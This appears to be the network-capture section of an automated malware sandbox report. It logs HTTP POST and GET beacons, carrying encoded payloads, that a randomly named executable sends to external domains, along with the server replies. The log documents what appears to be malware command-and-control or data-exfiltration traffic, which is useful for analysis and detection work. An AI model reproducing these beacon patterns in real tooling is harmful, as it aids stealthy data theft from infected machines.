                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            13192.168.11.2049732208.91.197.27802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:30:49.398493052 CET777OUTPOST /xvf3/ HTTP/1.1
                                                                                                                            Host: www.rimberiokitchen.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.rimberiokitchen.online
                                                                                                                            Referer: http://www.rimberiokitchen.online/xvf3/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 62 6e 70 76 35 75 6a 4a 32 33 42 41 4e 57 61 35 4e 37 51 69 59 73 4b 58 46 6b 79 67 75 77 65 44 64 6f 45 47 73 63 75 4a 59 64 5a 4f 5a 44 7a 65 67 41 46 52 46 6c 73 5a 43 6e 50 6e 65 44 37 54 75 37 4d 68 52 35 70 30 57 6b 47 6b 53 63 35 76 4f 59 68 5a 39 70 69 4f 61 54 4a 5a 49 4c 2f 79 49 67 69 4d 30 46 67 63 53 63 34 66 35 6a 48 54 2f 6c 76 41 6f 45 39 78 67 68 77 31 7a 53 6f 2f 49 34 55 54 4a 31 64 77 42 6e 33 72 4f 78 52 37 70 49 64 4b 4d 64 47 43 55 58 69 4e 45 5a 4f 6f 34 2f 72 4b 32 30 36 50 74 74 42 7a 73 63 78 38 74 6d 32 74 56 4f 38 69 37 69 32 37 49 67 65 45 41 67 3d 3d
                                                                                                                            Data Ascii: mRu=bnpv5ujJ23BANWa5N7QiYsKXFkyguweDdoEGscuJYdZOZDzegAFRFlsZCnPneD7Tu7MhR5p0WkGkSc5vOYhZ9piOaTJZIL/yIgiM0FgcSc4f5jHT/lvAoE9xghw1zSo/I4UTJ1dwBn3rOxR7pIdKMdGCUXiNEZOo4/rK206PttBzscx8tm2tVO8i7i27IgeEAg==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            14192.168.11.2049733208.91.197.27802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:30:52.073029995 CET797OUTPOST /xvf3/ HTTP/1.1
                                                                                                                            Host: www.rimberiokitchen.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.rimberiokitchen.online
                                                                                                                            Referer: http://www.rimberiokitchen.online/xvf3/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 62 6e 70 76 35 75 6a 4a 32 33 42 41 4c 48 71 35 64 6f 34 69 51 73 4b 59 4c 45 79 67 67 67 65 48 64 76 4d 47 73 64 36 5a 59 4f 39 4f 59 68 62 65 68 45 78 52 43 6c 73 5a 4b 48 50 2b 42 7a 37 59 75 37 51 54 52 39 70 30 57 6c 69 6b 53 64 4a 76 4f 72 4a 59 39 35 69 41 44 44 4a 62 4d 4c 2f 79 49 67 69 4d 30 47 63 32 53 63 67 66 2b 54 58 54 2f 42 62 42 69 6b 39 79 6f 42 77 31 6b 43 6f 37 49 34 55 68 4a 30 77 58 42 6b 50 72 4f 77 68 37 70 63 4a 46 58 74 47 45 51 58 69 5a 4e 39 44 50 6a 63 57 2f 77 7a 61 79 6e 4d 46 52 67 71 38 6d 77 55 43 4a 57 64 67 51 2f 53 50 54 4b 69 66 66 64 6f 72 34 7a 64 58 4e 4f 63 55 4b 42 6d 51 41 72 56 6b 46 4c 62 63 3d
                                                                                                                            Data Ascii: mRu=bnpv5ujJ23BALHq5do4iQsKYLEygggeHdvMGsd6ZYO9OYhbehExRClsZKHP+Bz7Yu7QTR9p0WlikSdJvOrJY95iADDJbML/yIgiM0Gc2Scgf+TXT/BbBik9yoBw1kCo7I4UhJ0wXBkPrOwh7pcJFXtGEQXiZN9DPjcW/wzaynMFRgq8mwUCJWdgQ/SPTKiffdor4zdXNOcUKBmQArVkFLbc=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            15192.168.11.2049734208.91.197.27802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:30:54.744513988 CET7946OUTPOST /xvf3/ HTTP/1.1
                                                                                                                            Host: www.rimberiokitchen.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.rimberiokitchen.online
                                                                                                                            Referer: http://www.rimberiokitchen.online/xvf3/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 62 6e 70 76 35 75 6a 4a 32 33 42 41 4c 48 71 35 64 6f 34 69 51 73 4b 59 4c 45 79 67 67 67 65 48 64 76 4d 47 73 64 36 5a 59 4f 31 4f 59 53 6a 65 67 6a 74 52 44 6c 73 5a 56 33 50 6a 42 7a 37 46 75 37 59 58 52 39 74 43 57 6d 4b 6b 51 2f 42 76 48 2b 39 59 33 35 69 41 4c 6a 4a 61 49 4c 2b 36 49 6a 4b 32 30 47 4d 32 53 63 67 66 2b 56 54 54 35 56 76 42 78 30 39 78 67 68 77 35 7a 53 6f 54 49 34 4d 78 4a 30 31 67 43 56 76 72 4e 51 78 37 71 70 64 46 4b 64 47 47 63 33 6a 65 4e 36 4c 51 6a 63 4c 47 77 7a 48 58 6e 50 56 52 78 73 39 35 74 6d 57 78 44 64 63 54 6a 44 6e 34 42 42 54 52 59 76 7a 61 79 37 54 4b 4a 72 34 4b 42 47 6f 74 7a 6c 4d 57 63 64 54 63 36 75 46 2f 31 64 67 32 74 37 52 32 39 59 78 6f 6e 66 70 67 6c 70 2f 32 49 62 48 53 6f 48 53 78 32 41 2b 41 4a 4f 35 6d 34 35 55 4f 4c 2f 6d 70 71 30 50 66 55 4a 4d 42 5a 56 65 2f 41 65 6b 42 32 69 66 6b 79 70 43 32 6f 66 58 42 6f 48 62 53 7a 4b 56 70 37 36 42 37 5a 36 50 36 50 30 71 66 66 65 49 4c 39 6b 4d 63 32 6d 49 55 6c 4f 6b 42 43 48 59 64 76 38 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=bnpv5ujJ23BALHq5do4iQsKYLEygggeHdvMGsd6ZYO1OYSjegjtRDlsZV3PjBz7Fu7YXR9tCWmKkQ/BvH+9Y35iALjJaIL+6IjK20GM2Scgf+VTT5VvBx09xghw5zSoTI4MxJ01gCVvrNQx7qpdFKdGGc3jeN6LQjcLGwzHXnPVRxs95tmWxDdcTjDn4BBTRYvzay7TKJr4KBGotzlMWcdTc6uF/1dg2t7R29Yxonfpglp/2IbHSoHSx2A+AJO5m45UOL/mpq0PfUJMBZVe/AekB2ifkypC2ofXBoHbSzKVp76B7Z6P6P0qffeIL9kMc2mIUlOkBCHYdv8w7/y5cBMh5i4ISDdQjFFXSkCnhopHG0p0kOjVWCJHC6NyH2+N3LLgBrYabHNOs0Lawm2oC71aMb9wvxLv9ItTmRuom+Zri9nqIBO/A1rpm3vL0nU1aBUMBDAiGCgCIO2jx1IGffpmP4XVS/ymV+8H+YNQMpIh3Z252em5z8Nf3scyOvS9bCgCHiIiVzz1fpb6siRW+IlB+05dj5GbsDc5g9LJjq4mjDDOCrWxcvnZAfXnH+PqWffe0gdkjCvEaxErgyzJHUEkY9HE9Fp55alL4CyYNVJ/CUOpHA13Hfd3/HujN6CowDtj0+Pa4NVS8Emt5siPbVqwJlqwsqLDa25vSkAchwbDF8z0s1xup4u30ynY+qXV/kJSQC+EuaLBTWUW27SrnH1exjhV7tkpNmBH+hiUTismo1vCb0ZGyigRQ/NvgKkosiEgnS/FnStBYXaSrOm22h0vjM7R1t1iLjck6NGPJ6Ax6Z8uFvyaNe/iIxNQ47NuLh6UA0xlhJmpkVDk9CU9Nm6Ba9k/AvuC7guSLosD0aACF7nOuUo0Rdyqiq+Y1wtHEwRy8sfbk1+RCLcCn+DLZDcx4EycGwE6ygq3KrDhL4Ma1VftSjcXiDKXn5u0S3sT8inpyXauTcmFzU9JXmgqsMx5gsY+3ONgkTW7kzhd0YyCftYTp [TRUNCATED]


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            16192.168.11.2049735208.91.197.27802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:30:57.412678003 CET485OUTGET /xvf3/?mRu=WlBP6ZDj33sme071J7YmRt2meznD9lOMeO4smNCsOshEYDb+rkIOBjcGODqfewmlgMUUULEtW3alEv1cIqlE3oXaOj92B6nyIwOIgW4/F45i+leDgRmHhUA=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.rimberiokitchen.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:30:58.706624985 CET1003INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Nov 2024 14:30:57 GMT
                                                                                                                            Server: Apache
                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                            Set-Cookie: vsid=906vr478967457601294220; expires=Sun, 11-Nov-2029 14:30:57 GMT; Max-Age=157680000; path=/; domain=www.rimberiokitchen.online; HttpOnly
                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_G9wrI8ErGCovIRiUwqpM3lqcVFgMFwvVC+ri2ftv8jyMhilLZEAxv+j+LXbUBYs/7SpZSgQzMtth1xjBKIOL2g==
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Connection: close
                                                                                                                            Nov 12, 2024 15:30:58.706641912 CET180INData Raw: 61 34 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c
                                                                                                                            Data Ascii: a426<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <
                                                                                                                            Nov 12, 2024 15:30:58.706651926 CET1220INData Raw: 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in wi
                                                                                                                            Nov 12, 2024 15:30:58.706753969 CET1220INData Raw: 70 75 73 68 28 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 5b 62 5d 2e 6c 29 7d 7d 7d 72 65 74 75 72 6e 20 61 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 6c 61 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 69
                                                                                                                            Data Ascii: push(window.cmp_customlanguages[b].l)}}}return a};window.cmp_getlang=function(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupported
                                                                                                                            Nov 12, 2024 15:30:58.706774950 CET1220INData Raw: 6f 3d 22 22 3b 76 61 72 20 62 3d 22 5f 65 6e 22 3b 69 66 28 22 63 6d 70 5f 67 65 74 6c 61 6e 67 22 20 69 6e 20 68 29 7b 6f 3d 68 2e 63 6d 70 5f 67 65 74 6c 61 6e 67 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 69 66 28 22 63 6d 70 5f 63 75
                                                                                                                            Data Ascii: o="";var b="_en";if("cmp_getlang" in h){o=h.cmp_getlang().toLowerCase();if("cmp_customlanguages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}functio
                                                                                                                            Nov 12, 2024 15:30:58.706785917 CET1220INData Raw: 26 63 6d 70 67 70 70 6b 65 79 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 72 29 3a 22 22 29 2b 28 6e 21 3d 22 22 3f 22 26 63 6d 70 61 74 74 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6e 29 3a 22 22 29
                                                                                                                            Data Ascii: &cmpgppkey="+encodeURIComponent(r):"")+(n!=""?"&cmpatt="+encodeURIComponent(n):"")+("cmp_params" in h?"&"+h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async
                                                                                                                            Nov 12, 2024 15:30:58.706794977 CET1220INData Raw: 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 68 65 61 64 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3e 30 29 7b 74 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 7d 7d 7d 29 28 29 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f
                                                                                                                            Data Ascii: }if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}})();window.cmp_addFrame=function(b){if(!window.frames[b]){if(document.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_u
                                                                                                                            Nov 12, 2024 15:30:58.706804991 CET1220INData Raw: 75 65 29 7d 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 67 65 74 55 53 50 44 61 74 61 22 29 7b 61 5b 32 5d 28 7b 76 65 72 73 69 6f 6e 3a 31 2c 75 73 70 53 74 72 69 6e 67 3a 77 69 6e 64 6f 77 2e 63 6d 70 5f 72 63 28 22 22 29 7d 2c 74 72 75
                                                                                                                            Data Ascii: ue)}}else{if(a[0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}e
                                                                                                                            Nov 12, 2024 15:30:58.706856012 CET1220INData Raw: 28 67 3d 3d 3d 22 67 65 74 47 50 50 44 61 74 61 22 29 7b 72 65 74 75 72 6e 7b 73 65 63 74 69 6f 6e 49 64 3a 33 2c 67 70 70 56 65 72 73 69 6f 6e 3a 31 2c 73 65 63 74 69 6f 6e 4c 69 73 74 3a 5b 5d 2c 61 70 70 6c 69 63 61 62 6c 65 53 65 63 74 69 6f
                                                                                                                            Data Ascii: (g==="getGPPData"){return{sectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}
                                                                                                                            Nov 12, 2024 15:30:58.706866980 CET1220INData Raw: 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69
                                                                                                                            Data Ascii: Return:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function
                                                                                                                            Nov 12, 2024 15:30:58.706876993 CET1220INData Raw: 70 5f 64 69 73 61 62 6c 65 75 73 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 75 73 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 75 73 70 61 70 69 22 29 7d 69
                                                                                                                            Data Ascii: p_disableusp" in window)||!window.cmp_disableusp){window.cmp_setStub("__uspapi")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="t


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            17192.168.11.2049736203.161.49.193802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:31:04.363424063 CET762OUTPOST /cadc/ HTTP/1.1
                                                                                                                            Host: www.futurevision.life
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.futurevision.life
                                                                                                                            Referer: http://www.futurevision.life/cadc/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 2f 64 5a 67 7a 32 48 49 68 5a 46 78 64 6b 70 31 48 34 74 50 75 33 59 45 4c 65 50 30 6d 33 55 46 33 71 62 53 6a 4e 57 6e 59 39 4c 39 44 44 70 58 32 6f 64 41 6f 4a 78 73 79 63 79 55 68 52 7a 63 36 68 46 4d 61 37 58 71 47 47 36 68 41 48 6c 49 6d 49 71 65 62 52 6d 62 4b 6b 77 46 75 6c 50 69 46 57 57 35 30 7a 68 62 78 58 49 63 4e 58 2b 50 75 34 48 61 45 6b 5a 32 4f 2b 37 76 50 65 6f 59 50 46 59 61 6c 33 69 39 56 35 4d 2f 6d 61 57 32 72 70 74 77 32 39 61 52 43 54 77 54 71 45 78 42 2b 2f 61 4f 76 53 33 2b 50 6a 46 4d 32 65 6f 54 49 37 50 43 55 39 76 63 7a 45 34 48 79 57 52 42 31 41 3d 3d
                                                                                                                            Data Ascii: mRu=/dZgz2HIhZFxdkp1H4tPu3YELeP0m3UF3qbSjNWnY9L9DDpX2odAoJxsycyUhRzc6hFMa7XqGG6hAHlImIqebRmbKkwFulPiFWW50zhbxXIcNX+Pu4HaEkZ2O+7vPeoYPFYal3i9V5M/maW2rptw29aRCTwTqExB+/aOvS3+PjFM2eoTI7PCU9vczE4HyWRB1A==
                                                                                                                            Nov 12, 2024 15:31:04.558024883 CET533INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:31:04 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            18192.168.11.2049737203.161.49.193802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:31:07.085984945 CET782OUTPOST /cadc/ HTTP/1.1
                                                                                                                            Host: www.futurevision.life
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.futurevision.life
                                                                                                                            Referer: http://www.futurevision.life/cadc/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 2f 64 5a 67 7a 32 48 49 68 5a 46 78 64 45 35 31 42 5a 74 50 35 48 59 48 56 4f 50 30 76 58 56 4d 33 71 58 53 6a 4d 43 33 5a 50 2f 39 44 69 5a 58 6e 61 31 41 72 4a 78 73 6d 4d 79 52 73 78 7a 62 36 68 49 7a 61 2b 76 71 47 47 75 68 41 47 56 49 6d 59 57 52 62 42 6d 5a 66 55 77 48 67 46 50 69 46 57 57 35 30 79 46 39 78 58 77 63 4e 6e 75 50 38 4b 76 56 48 6b 5a 35 65 75 37 76 4c 65 6f 55 50 46 59 38 6c 31 58 61 56 37 45 2f 6d 66 71 32 6f 38 42 33 38 39 62 59 50 7a 78 45 6b 6e 6f 4a 79 37 36 47 35 79 48 4f 44 52 4e 62 7a 49 6c 4a 56 4a 37 6d 58 75 7a 75 33 30 42 76 77 55 51 61 6f 46 68 41 51 4b 61 6d 73 72 52 31 71 78 4b 6f 58 35 62 39 53 5a 6f 3d
                                                                                                                            Data Ascii: mRu=/dZgz2HIhZFxdE51BZtP5HYHVOP0vXVM3qXSjMC3ZP/9DiZXna1ArJxsmMyRsxzb6hIza+vqGGuhAGVImYWRbBmZfUwHgFPiFWW50yF9xXwcNnuP8KvVHkZ5eu7vLeoUPFY8l1XaV7E/mfq2o8B389bYPzxEknoJy76G5yHODRNbzIlJVJ7mXuzu30BvwUQaoFhAQKamsrR1qxKoX5b9SZo=
                                                                                                                            Nov 12, 2024 15:31:07.284389973 CET533INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:31:07 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
